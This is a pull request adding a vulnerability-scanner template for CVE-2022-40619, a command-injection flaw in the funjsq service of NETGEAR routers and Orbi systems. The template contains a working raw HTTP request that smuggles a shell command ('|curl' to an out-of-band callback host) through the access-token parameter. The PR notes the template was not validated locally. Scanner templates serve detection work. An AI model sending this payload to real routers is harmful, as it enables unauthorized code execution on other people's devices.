### PR TITLE
Create CVE-2022-40619.yaml

### DIFF
--- a/cves/2022/CVE-2022-40619.yaml
+++ b/cves/2022/CVE-2022-40619.yaml
@@ -5,7 +5,7 @@ info:
   author: gy741
   severity: critical
   description: |
-    This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Routers or Orbi WiFi Systems. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the funjsq_httpd service, which listens on TCP port 12300 by default. 
+    This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Routers or Orbi WiFi Systems. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the funjsq_httpd service, which listens on TCP port 12300 by default.
   reference:
     - https://onekey.com/blog/security-advisory-netgear-routers-funjsq-vulnerabilities/
   classification:

--- a/cves/2022/CVE-2022-40619.yaml
+++ b/cves/2022/CVE-2022-40619.yaml
@@ -1,0 +1,29 @@
+id: CVE-2022-40619
+
+info:
+  name: NETGEAR Routers FunJSQ - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: |
+    This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Routers or Orbi WiFi Systems. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the funjsq_httpd service, which listens on TCP port 12300 by default. 
+  reference:
+    - https://onekey.com/blog/security-advisory-netgear-routers-funjsq-vulnerabilities/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-40619
+    cwe-id: CWE-78
+  tags: netgear,cve,cve2022,router,unauth,rce
+
+requests:
+  - raw:
+      - |
+        GET /apply_bind.cgi?action_mode=funjsq_bind&funjsq_access_token=e594ff4c36742acf006cdf16'|curl {{interactsh-url}}|' HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2022-40619

```
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Routers or Orbi WiFi Systems. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the funjsq_httpd service, which listens on TCP port 12300 by default.
```

- References: https://onekey.com/blog/security-advisory-netgear-routers-funjsq-vulnerabilities/

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO